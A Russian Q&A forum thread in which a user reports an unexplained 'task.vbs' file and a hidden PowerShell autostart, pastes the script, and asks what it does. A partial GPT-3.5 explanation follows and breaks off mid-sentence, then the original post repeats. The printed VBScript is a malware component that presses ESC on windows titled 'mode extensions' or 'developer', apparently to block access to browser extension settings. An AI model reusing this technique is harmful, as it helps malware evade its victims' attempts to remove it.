Нашёл странный файл "task.vbs" в документах. Что делать?
Funtime Freddy
Ученик
(243),
на голосовании
4 месяца назад
Ну как нашёл, он сам себя нашёл. Сижу я за пк, занимаюсь своими делами, как вдруг вылетает оповещение о ошибке при выполнения скрипта "task.vbs" в документах. Я после такого охренел знатна, в автозагрузках такого нет и НЕ БЫЛО!!! Перетащил этот файл на рабочий стол, чтобы он не мог запуститься, так теперь у меня регулярно всплывает оповещение о том что скрипт не нашёл "task.vbs" в документах. Я решил посмотреть что там, в "task.vbs", открыл через блокнот (без запуска), а там вот этот код:
Set wshShell = CreateObject("WScript.Shell")
startTime = Now doWhileTimeout = 7 / 86400 Do While Now - startTime < doWhileTimeout If wshShell.AppActivate("mode extensions") or wshShell.AppActivate("разработчика") or wshShell.AppActivate("розробника") Then wshShell.SendKeys "{ESC}" End If WScript.Sleep 10 Loop
If Now - startTime >= doWhileTimeout Then WScript.Quit End If
Если я правильно понял, этот код в какой-то момент эмитирует нажатие ESC, если да , то я вообще не понимаю , что это и зачем. Помогите чем сможете, пожалуйста
Небольшое дополнение: я установил антивирус 360 (спорный но рабочий), так он при проверки автозагрузок показал, что там есть скрытая загрузка приложения powershell.exe, приложение оригинальное , т.е оно запускает какой-то скрипт?
это понятно что вирус, просто вдруг кто-то знает где расположена его другая часть
Chagil999,
B
что делает жта команда?
Set wshShell = CreateObject("WScript.Shell")
startTime = Now
doWhileTimeout = 7 / 86400
Do While Now - startTime < doWhileTimeout
If wshShell.AppActivate("mode extensions") or wshShell.AppActivate("разработчика") or wshShell.AppActivate("розробника") Then
wshShell.SendKeys "{ESC}"
End If
WScript.Sleep 10
Loop
If Now - startTime >= doWhileTimeout Then
WScript.Quit
End If
GPT-3.5
Этот скрипт на языке VBScript создает объект WScript.Shell, который используется для взаимодействия с окружением Windows.
Далее скрипт запоминает текущее время (startTime) и устанавливает время ожидания (doWhileTimeout) в 7 секунд. Затем в цикле Do While скрипт проверяет условие: если с момента startTime прошло менее 7 секунд и открыто одно из приложений с заголовком
Сижу я за пк, занимаюсь своими делами, как вдруг вылетает оповещение о ошибке при выполнения скрипта "task.vbs" в документах. Я после такого охренел знатна, в автозагрузках такого нет и НЕ БЫЛО!!! Перетащил этот файл на рабочий стол, чтобы он не мог запуститься, так теперь у меня регулярно всплывает оповещение о том что скрипт не нашёл "task.vbs" в документах.
Я решил посмотреть что там, в "task.vbs", открыл через блокнот (без запуска), а там вот этот код: Если я правильно понял, этот код в какой-то момент эмитирует нажатие ESC, если да , то я вообще не понимаю , что это и зачем.
Помогите чем сможете, пожалуйста
Небольшое дополнение: я установил антивирус 360 (спорный но рабочий), так он при проверки автозагрузок показал, что там есть скрытая загрузка приложения powershell.exe, приложение оригинальное , т.е оно запускает какой-то скрипт?